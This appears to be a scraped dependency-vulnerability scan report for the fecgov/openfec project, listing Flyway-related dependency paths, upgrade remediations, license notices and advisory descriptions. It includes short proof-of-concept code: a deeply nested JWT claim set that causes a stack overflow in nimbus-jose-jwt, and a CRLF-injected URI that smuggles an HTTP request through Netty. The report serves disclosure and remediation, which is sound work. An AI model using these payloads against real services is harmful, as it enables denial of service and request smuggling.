Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-database-tidb@10.24.0 › org.flywaydb:flyway-core@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-firebird@12.0.3 › org.flywaydb:flyway-core@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-gcp-bigquery@12.0.3 › org.flywaydb:flyway-core@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-gcp-spanner@12.0.3 › org.flywaydb:flyway-core@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-singlestore@12.0.3 › org.flywaydb:flyway-core@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-sqlserver@12.0.3 › org.flywaydb:flyway-core@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-verb-baseline@12.0.3 › org.flywaydb:flyway-verb-schemas@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-verb-migrate@12.0.3 › org.flywaydb:flyway-verb-schemas@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-gradle-plugin@12.0.3 › org.flywaydb:flyway-database-oracle@12.0.3 › org.flywaydb:flyway-core@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-gradle-plugin@12.1.0.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-verb-migrate@12.0.3 › org.flywaydb:flyway-verb-baseline@12.0.3 › org.flywaydb:flyway-verb-schemas@12.0.3 › tools.jackson.core:jackson-databind@3.0.4 › tools.jackson.core:jackson-core@3.0.4

Remediation: Upgrade to org.flywaydb:flyway-commandline@12.1.0.

Overview

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in ReaderBasedJsonParser.java and UTF8DataInputJsonParser.java, when processing deeply nested data. A regression in 3.0 versions caused the StreamReadConstraints.maxNestingDepth setting for DataInput to not be checked, allowing resources to be overwhelmed by malicious inputs.

Remediation

Upgrade tools.jackson.core:jackson-core to version 3.1.0 or higher.

References

Allocation of Resources Without Limits or Throttling vulnerability report

high severity

Multiple licenses: EPL-1.0, GPL-2.0, LGPL-2.1

Module: com.github.jnr:jnr-posix
Introduced through: org.flywaydb:flyway-commandline@12.0.3

Detailed paths

Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.ing.data:cassandra-jdbc-wrapper@4.13.0 › org.apache.cassandra:java-driver-core@4.18.1 › com.github.jnr:jnr-posix@3.1.15

Multiple licenses: EPL-1.0, GPL-2.0, LGPL-2.1

Multiple licenses: EPL-1.0, GPL-2.0, LGPL-2.1 vulnerability report

medium severity

Uncontrolled Recursion

Vulnerable module: com.nimbusds:nimbus-jose-jwt
Introduced through: org.flywaydb:flyway-commandline@12.0.3

Detailed paths

Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.microsoft.azure:msal4j@1.20.0 › com.nimbusds:oauth2-oidc-sdk@11.23 › com.nimbusds:nimbus-jose-jwt@10.0.1
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.azure:azure-identity@1.15.4 › com.microsoft.azure:msal4j@1.20.0 › com.nimbusds:oauth2-oidc-sdk@11.23 › com.nimbusds:nimbus-jose-jwt@10.0.1
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.azure:azure-identity@1.15.4 › com.microsoft.azure:msal4j-persistence-extension@1.3.0 › com.microsoft.azure:msal4j@1.20.0 › com.nimbusds:oauth2-oidc-sdk@11.23 › com.nimbusds:nimbus-jose-jwt@10.0.1

Overview

com.nimbusds:nimbus-jose-jwt is a library for JSON Web Tokens (JWT)

Affected versions of this package are vulnerable to Uncontrolled Recursion due to the improper handling JWT claim sets containing deeply nested JSON objects. An attacker can cause application downtime or resource exhaustion by submitting a specially crafted JWT with excessive nesting.

Note:

This issue only affects nimbus-jose-jwt, not Gson because the Connect2id product could have checked the JSON object nesting depth, regardless of what limits (if any) were imposed by Gson.

PoC

import com.nimbusds.jwt.JWTClaimsSet;
import java.text.ParseException;
import java.util.HashMap;
import java.util.Map;

public class Test {
    // This builds a claimset with a deeply nested map, which could theoretically be supplied by a client.
    // If the JWT is serialized into JSON (for example, in logging or debugging), it can cause a StackOverflowError.
    public static void main(String[] args) throws ParseException {        
        Map<String, Object> nestedMap = new HashMap<>();
        Map<String, Object> currentLevel = nestedMap;

        for (int i = 0; i < 5000; i++) {
            Map<String, Object> nextLevel = new HashMap<>();
            currentLevel.put("", nextLevel);
            currentLevel = nextLevel;
        }

        JWTClaimsSet claimSet = JWTClaimsSet.parse(nestedMap);

        // This will cause a StackOverflowError due to excessive recursion in GSON's serialization
        claimSet.toString();
    }
}

Remediation

Upgrade com.nimbusds:nimbus-jose-jwt to version 9.37.4, 10.0.2 or higher.

References

Uncontrolled Recursion vulnerability report

medium severity

CRLF Injection

Vulnerable module: io.netty:netty-codec-http
Introduced through: software.amazon.awssdk:netty-nio-client@2.32.22 and org.flywaydb:flyway-commandline@12.0.3

Detailed paths

Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › software.amazon.awssdk:netty-nio-client@2.32.22 › io.netty:netty-codec-http@4.1.118.Final

Remediation: Upgrade to software.amazon.awssdk:netty-nio-client@2.40.17.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › software.amazon.awssdk:netty-nio-client@2.32.22 › io.netty:netty-codec-http2@4.1.118.Final › io.netty:netty-codec-http@4.1.118.Final

Remediation: Upgrade to software.amazon.awssdk:netty-nio-client@2.40.17.
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.azure:azure-identity@1.15.4 › com.azure:azure-core-http-netty@1.15.11 › io.netty:netty-codec-http@4.1.118.Final
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.azure:azure-identity@1.15.4 › com.azure:azure-core-http-netty@1.15.11 › io.netty:netty-codec-http2@4.1.118.Final › io.netty:netty-codec-http@4.1.118.Final
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.azure:azure-identity@1.15.4 › com.azure:azure-core-http-netty@1.15.11 › io.netty:netty-handler-proxy@4.1.118.Final › io.netty:netty-codec-http@4.1.118.Final
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.azure:azure-identity@1.15.4 › com.azure:azure-core-http-netty@1.15.11 › io.projectreactor.netty:reactor-netty-http@1.0.48 › io.netty:netty-codec-http@4.1.118.Final
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.azure:azure-identity@1.15.4 › com.azure:azure-core-http-netty@1.15.11 › io.projectreactor.netty:reactor-netty-http@1.0.48 › io.netty:netty-codec-http2@4.1.118.Final › io.netty:netty-codec-http@4.1.118.Final
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.azure:azure-identity@1.15.4 › com.azure:azure-core-http-netty@1.15.11 › io.projectreactor.netty:reactor-netty-http@1.0.48 › io.projectreactor.netty:reactor-netty-core@1.0.48 › io.netty:netty-handler-proxy@4.1.118.Final › io.netty:netty-codec-http@4.1.118.Final

Overview

io.netty:netty-codec-http is a network application framework for rapid development of maintainable high performance protocol servers & clients.

Affected versions of this package are vulnerable to CRLF Injection in HttpRequestEncoder, due to improper sanitization of a URI with line-breaks in the DefaultHttpRequest class. An attacker can manipulate HTTP requests to cause parser desynchronization, request smuggling, and response splitting by including line break characters in requests.

PoC


public static void main(String[] args) {

  EmbeddedChannel client = new EmbeddedChannel();
  client.pipeline().addLast(new HttpClientCodec());

  EmbeddedChannel server = new EmbeddedChannel();
  server.pipeline().addLast(new HttpServerCodec());
  server.pipeline().addLast(new ChannelInboundHandlerAdapter() {
    @Override
    public void channelRead(ChannelHandlerContext ctx, Object msg) throws Exception {
      System.out.println("Processing msg " + msg);
    }
  });

  DefaultHttpRequest request = new DefaultHttpRequest(
    HttpVersion.HTTP_1_1,
    HttpMethod.GET,
    "/s1 HTTP/1.1\r\n" +
      "\r\n" +
      "POST /s2 HTTP/1.1\r\n" +
      "content-length: 11\r\n\r\n" +
      "Hello World" +
      "GET /s1"
  );
  client.writeAndFlush(request);
  ByteBuf tmp;
  while ((tmp = client.readOutbound()) != null) {
    server.writeInbound(tmp);
  }
}

Remediation

Upgrade io.netty:netty-codec-http to version 4.1.129.Final, 4.2.8.Final or higher.

References

GitHub Commit

CRLF Injection vulnerability report

medium severity

new

Regular Expression Denial of Service (ReDoS)

Vulnerable module: net.snowflake:snowflake-jdbc
Introduced through: org.flywaydb:flyway-commandline@12.0.3

Detailed paths

Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › net.snowflake:snowflake-jdbc@3.27.0

Overview

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the SdkProxyRoutePlanner function. An attacker can cause significant resource consumption and degrade application performance by providing specially crafted input to the nonProxyHosts argument.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

A The string must start with the letter 'A'
(B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

CCC
CC+C
C+CC
C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String	Number of C's	Number of steps
ACCCX	3	38
ACCCCX	4	71
ACCCCCX	5	136
ACCCCCCCCCCCCCCX	14	65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

A fix was pushed into the master branch but not yet published.

References

Regular Expression Denial of Service (ReDoS) vulnerability report

medium severity

Dual license: EPL-1.0, MPL-2.0

Module: com.h2database:h2
Introduced through: org.flywaydb:flyway-commandline@12.0.3

Detailed paths

Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.h2database:h2@2.3.232

Dual license: EPL-1.0, MPL-2.0

Dual license: EPL-1.0, MPL-2.0 vulnerability report

medium severity

LGPL-2.1 license

Module: com.singlestore:singlestore-jdbc-client
Introduced through: org.flywaydb:flyway-commandline@12.0.3

Detailed paths

Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.singlestore:singlestore-jdbc-client@1.2.8
Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.flywaydb:flyway-singlestore@12.0.3 › com.singlestore:singlestore-jdbc-client@1.2.8

LGPL-2.1 license

LGPL-2.1 license vulnerability report

medium severity

EPL-1.0 license

Module: junit:junit
Introduced through: org.flywaydb:flyway-commandline@12.0.3

Detailed paths

Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.google.cloud:google-cloud-storage@2.60.0 › com.google.api.grpc:gapic-google-cloud-storage-v2@2.60.0 › junit:junit@4.13.2

EPL-1.0 license

EPL-1.0 license vulnerability report

medium severity

LGPL-3.0 license

Module: net.sourceforge.jtds:jtds
Introduced through: org.flywaydb:flyway-commandline@12.0.3

Detailed paths

Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › net.sourceforge.jtds:jtds@1.3.1

LGPL-3.0 license

LGPL-3.0 license vulnerability report

medium severity

LGPL-2.1 license

Module: org.mariadb.jdbc:mariadb-java-client
Introduced through: org.flywaydb:flyway-commandline@12.0.3

Detailed paths

Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › org.mariadb.jdbc:mariadb-java-client@2.7.13

LGPL-2.1 license

LGPL-2.1 license vulnerability report

low severity

Exposure of Sensitive System Information to an Unauthorized Control Sphere

Vulnerable module: io.projectreactor.netty:reactor-netty-http
Introduced through: org.flywaydb:flyway-commandline@12.0.3

Detailed paths

Introduced through: fecgov/openfec@fecgov/openfec#ca7f6a686d64cd8e13341d81f5b1b5ff4703f0d4 › org.flywaydb:flyway-commandline@12.0.3 › com.azure:azure-identity@1.15.4 › com.azure:azure-core-http-netty@1.15.11 › io.projectreactor.netty:reactor-netty-http@1.0.48

Overview

Affected versions of this package are vulnerable to Exposure of Sensitive System Information to an Unauthorized Control Sphere via handling of chained redirects. An attacker can cause the Reactor Netty HTTP client to leak credentials such as session cookies by intercepting initial HTTP/1.1 requests containing and replaying them on new HTTP/2 connections.

Notes:

For this to be exploited, the HTTP client must have been explicitly configured to follow redirects.
For the commercial version of Spring, patches are also available for the 1.0.x and 1.1.x streams in 1.0.49 and 1.1.32 respectively.

Remediation

Upgrade io.projectreactor.netty:reactor-netty-http to version 1.2.8, 1.3.0-M5 or higher.

References

Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability report

Vulnerabilities

Dependencies

Source

Commit

Find, fix and prevent vulnerabilities in your code.

high severity

Uncontrolled Recursion

Detailed paths

Overview

Remediation

References

high severity new

Allocation of Resources Without Limits or Throttling

Detailed paths

Overview

PoC

Details

Remediation

References

high severity

HTTP Request Smuggling

Detailed paths

Overview

Remediation

References

high severity

Improper Handling of Highly Compressed Data (Data Amplification)

Detailed paths

Overview

PoC

Remediation

References

high severity

Allocation of Resources Without Limits or Throttling

Detailed paths

Overview

Remediation

References

high severity

Improper Handling of Highly Compressed Data (Data Amplification)

Detailed paths

Overview

PoC

Remediation

References

high severity

Improper Validation of Specified Quantity in Input

Detailed paths

Overview

Workaround

Remediation

References

high severity new

Allocation of Resources Without Limits or Throttling

Detailed paths

Overview

PoC

Details

Remediation

References

high severity new

Allocation of Resources Without Limits or Throttling

Detailed paths

Overview

Remediation

References

high severity

Multiple licenses: EPL-1.0, GPL-2.0, LGPL-2.1

Detailed paths

medium severity

Uncontrolled Recursion

Detailed paths

Overview

PoC

Remediation

References

medium severity

CRLF Injection

Detailed paths

Overview

high severity

new

high severity

new

high severity

new

medium severity

new